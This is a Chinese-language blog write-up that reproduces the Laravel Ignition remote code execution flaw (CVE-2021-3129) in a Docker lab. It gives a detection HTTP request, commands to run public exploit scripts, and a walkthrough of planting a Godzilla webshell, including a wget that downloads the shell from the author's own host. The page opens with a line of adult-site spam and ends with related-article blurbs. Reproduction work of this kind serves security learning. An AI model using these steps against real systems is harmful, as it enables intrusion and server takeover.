国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Laravel RCE(CVE-2021-3129)復(fù)現(xiàn)

這篇具有很好參考價值的文章主要介紹了Laravel RCE(CVE-2021-3129)復(fù)現(xiàn)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

目錄

參考

環(huán)境搭建

漏洞分析

漏洞檢測

漏洞利用

第一種方法 這個主要是關(guān)于工具腳本

第二種方法


參考

CVE-2021-3129 分析-云社區(qū)-華為云

環(huán)境搭建

我們這里通過docker來搞環(huán)境

https://github.com/SNCKER/CVE-2021-3129

//通過git復(fù)制過來
git clone https://github.com/SNCKER/CVE-2021-3129

//來到這個文件夾中
cd CVE*

//使用docker啟動,沒有docker-compose kali可以通過apt安裝
docker-compose up -d
docker ps //查看開啟的環(huán)境

//查看自己ip,然后訪問
http://ip:8888

點擊這個key,然后點擊那里有橫線的

?laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

漏洞分析

漏洞檢測

?這里使用burp方便一點,下面是檢測有沒有漏洞的poc

POST /_ignition/execute-solution HTTP/1.1
Host: localhost:8000
Content-Length: 169
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Origin: http://localhost:8000
Referer: http://localhost:8000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
    "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
    "parameters": {
        "variableName": "1",
        "viewFile": "1"
    }
}

我們接下來打開burp,在這里,我們將上面的復(fù)制進去。

laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

點擊發(fā)送以后我們配置一下,這里使用自己環(huán)境機子的ip

laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

最后響應(yīng)包中是500,便是存在漏洞。

laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

漏洞利用

第一種方法

注:兩個exp我都沒有成功,但是有人成功,可能是我機子有問題,所以這里大家可以自己試試

第一個exp

這里我們git過來的文件中就有exp python文件

然后我們最后一行修改內(nèi)容為自己環(huán)境的ip和想執(zhí)行的命令

laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

?但是我們這里需要phpggc的環(huán)境,這里有兩種方法:

1. git復(fù)制過來工具,git clone https://github.com/ambionics/phpggc.git

??? 這里注意exp文件要和工具在一個目錄中,這種不太推薦。

2. 我們使用kali直接下載這個工具,lsudo apt-get install phpggc

但是吧,這里也不坑大家,這里我屬實是沒有成功,里面的三個rce跑完了也沒有跑出來,但是也建議大家自己試試

所以我去github有找到了另一個exp,去嘗試嘗試。

第二個exp

#另一個exp
//還是使用git復(fù)制過來
git clone https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

//然后來到那個目錄中
cd laraver-CVE*

//這里要看自己的ip
python3 laravel-CVE-2021-3129-EXP.py http://192.168.1.16:8888

?laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

作者提示我們是使用哥斯拉的,這里都別用錯了。

?laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

但是這里又出現(xiàn)一個問題,就是我們連不上,這里自己分析一下問題。

1.寫進去的馬有問題

2.寫進去了但是文件是空

3.自己操作有問題

4.哥斯拉有問題

首先3可以排除了,這里操作基本沒什么問題。

然后就是4,這里我們生成一個php的馬,然后放到本地機中,可以連接,沒有問題

1和2都需要我們?nèi)ト萜髂夸浿锌纯?/p>

進入容器的方法可以看看這個docker進入容器中的方法

根目錄在/src/public中

我們發(fā)現(xiàn)了這個木馬,經(jīng)過查看沒有發(fā)現(xiàn)什么不對的,這里排除了2,接下來就是驗證馬的問題了

?laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

我們使用哥斯拉生成一個shell.php的馬,然后使用開啟apache之類,放到根目錄中,把后綴改成txt,然后我們使用wget下載過來。

//這里使用我們開啟網(wǎng)站的ip,看看自己的
wget http://192.168.1.5/shell.txt

//然后把后綴改回來
mv shell.txt shell.php

?laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

最終這個是連接上去了,這樣就是馬出了問題,我們查看一下兩個的區(qū)別。

?laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker

我們發(fā)現(xiàn)這個有換行,那個沒換行,感覺就是這個問題了,但是有的人確實可以直接連接,會不會是我哥斯拉版本有點高。

?laravel exp,cve復(fù)現(xiàn),linux,經(jīng)驗分享,安全,學(xué)習(xí),docker


第二種方法

?因為本人還是比較菜,不怎么分析的明白,這里建議還看看華為云開發(fā)者聯(lián)盟這里的文章來源地址http://www.zghlxwxcb.cn/news/detail-562373.html

到了這里,關(guān)于Laravel RCE(CVE-2021-3129)復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Windows MSDT RCE(CVE-2022-30190)復(fù)現(xiàn)

    Windows MSDT RCE(CVE-2022-30190)復(fù)現(xiàn)

    可利用惡意 Office 文件中的遠程模板功能從遠程網(wǎng)絡(luò)服務(wù)器獲取惡意 HTML 文件,通過微軟支持診斷工具(Microsoft Support Diagnostic Tool,MSDT)執(zhí)行惡意 PowerShell 代碼。該漏洞在宏被禁用的情況下,仍然可以調(diào)用 MSDT 執(zhí)行惡意代碼。并且當惡意文件另存為 RTF 格式時,還可以通過

    2024年02月07日
    瀏覽(19)
  • Fortinet FortiNAC RCE漏洞復(fù)現(xiàn)(CVE-2022-39952)

    ? ? ? FortiNAC(Network Access Control) 是Fortinet的一種零信任網(wǎng)絡(luò)訪問控制解決方案,可增強用戶對企業(yè)網(wǎng)絡(luò)上的物聯(lián)網(wǎng) (IoT) 設(shè)備的監(jiān)控。NAC 是零信任網(wǎng)絡(luò)訪問安全模型的重要組成部分,在該模型中,IT 團隊可以輕松了解正在訪問網(wǎng)絡(luò)的人員和設(shè)備,以及如何保護網(wǎng)絡(luò)內(nèi)外的公司資

    2024年02月06日
    瀏覽(23)
  • CVE-2021-22204 GitLab RCE之exiftool代碼執(zhí)行漏洞深入分析(二)

    文章寫于2022-01-19,首發(fā)在天融信阿爾法實驗室 1 前言 2 前置知識 2.1 JPEG文件格式 2.2 Perl模式匹配 3 exiftool源碼調(diào)試到漏洞分析 3.1 環(huán)境搭建 3.2 漏洞簡介 3.3 exiftool是如何解析嵌入的0xc51b標簽 3.4 exiftool是如何調(diào)用parseAnt函數(shù) 3.5 parseAnt函數(shù)分析 3.6 parseAnt漏洞分析 4 漏洞利用 4.1

    2024年02月14日
    瀏覽(20)
  • CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一個專業(yè)的企業(yè)知識管理與協(xié)同軟件,主要用于公司內(nèi)員工創(chuàng)建知識庫并建立知識管理流程,也可以用于構(gòu)建企業(yè)wiki。其使用簡單,但它強大的編輯和站點管理特征能夠幫助團隊成員之間共享信息、文檔協(xié)作、集體討論,信息推送。因此

    2024年02月16日
    瀏覽(19)
  • Django系列所有漏洞復(fù)現(xiàn)vulhubCVE-2018-14574,CVE-2022-34265,CVE-2021-35042

    Django系列所有漏洞復(fù)現(xiàn)vulhubCVE-2018-14574,CVE-2022-34265,CVE-2021-35042

    Django默認配置下,如果匹配上的URL路由中最后一位是/,而用戶訪問的時候沒加/,Django默認會跳轉(zhuǎn)到帶/的請求中。(由配置項中的django.middleware.common.CommonMiddleware、APPEND_SLASH來決定)。 在path開頭為//example.com的情況下,Django沒做處理,導(dǎo)致瀏覽器認為目的地址是絕對路徑,最

    2024年02月07日
    瀏覽(20)
  • Sudo堆溢出漏洞(CVE-2021-3156)復(fù)現(xiàn)

    2021 年 1 月 26 日,Qualys Research Labs在 sudo 發(fā)現(xiàn)了一個缺陷。sudo 解析命令行參數(shù)的方式時,錯誤的判斷了截斷符,從而導(dǎo)致攻擊者可以惡意構(gòu)造載荷,使得sudo發(fā)生堆溢出,該漏洞在配合環(huán)境變量等分配堆以及釋放堆的原語下,可以致使本地提權(quán)。 環(huán)境版本 ? ubuntu 20.04 ? su

    2024年02月11日
    瀏覽(22)
  • CVE-2021-22205 GitLab 遠程命令執(zhí)行漏洞復(fù)現(xiàn)

    CVE-2021-22205 GitLab 遠程命令執(zhí)行漏洞復(fù)現(xiàn)

    目錄 一、漏洞信息 二、環(huán)境搭建 三、復(fù)現(xiàn)過程 1.測試漏洞 2.漏洞利用,反彈shell 四、修復(fù)建議 一、漏洞信息 漏洞名稱 GITLAB 遠程命令執(zhí)行漏洞 漏洞編號 CVE-2021-22205 危害等級 高危 CVSS評分 6.5 漏洞廠商 Ruby 受影響版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    瀏覽(25)
  • HIKVISION??低暣a執(zhí)行漏洞復(fù)現(xiàn)(CVE-2021-36260)

    HIKVISION??低暣a執(zhí)行漏洞復(fù)現(xiàn)(CVE-2021-36260)

    2023年將會持續(xù)于B站、CSDN等各大平臺更新,可加入粉絲群與博主交流:838681355,為了老板大G共同努力。 GET訪問/x.asp

    2024年02月12日
    瀏覽(21)
  • CVE-2021-1675 Windows Print Spooler權(quán)限提升漏洞復(fù)現(xiàn)

    CVE-2021-1675 Windows Print Spooler權(quán)限提升漏洞復(fù)現(xiàn)

    Microsoft Windows Print Spooler 服務(wù)未能限制對RpcAddPrinterDriverEx()函數(shù)的訪問,該函數(shù)可能允許遠程身份驗證的攻擊者以系統(tǒng)權(quán)限在易受攻擊的系統(tǒng)上執(zhí)行任意代碼。該RpcAddPrinterDriverEx()函數(shù)用于在系統(tǒng)上安裝打印機驅(qū)動程序。此函數(shù)的參數(shù)之一是DRIVER_CONTAINER對象,它包含有關(guān)添加的

    2024年02月06日
    瀏覽(24)
  • WebLogic反序列化漏洞復(fù)現(xiàn)+利用工具(CVE-2021-2394)

    WebLogic反序列化漏洞復(fù)現(xiàn)+利用工具(CVE-2021-2394)

    Oracle官方發(fā)布了2021年7月份安全更新通告,通告中披露了WebLogic組件存在高危漏洞,攻擊者可以在未授權(quán)的情況下通過IIOP、T3協(xié)議對存在漏洞的WebLogic Server組件進行攻擊。成功利用該漏洞的攻擊者可以接管WebLogic Server。 這是一個二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的

    2024年02月06日
    瀏覽(37)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包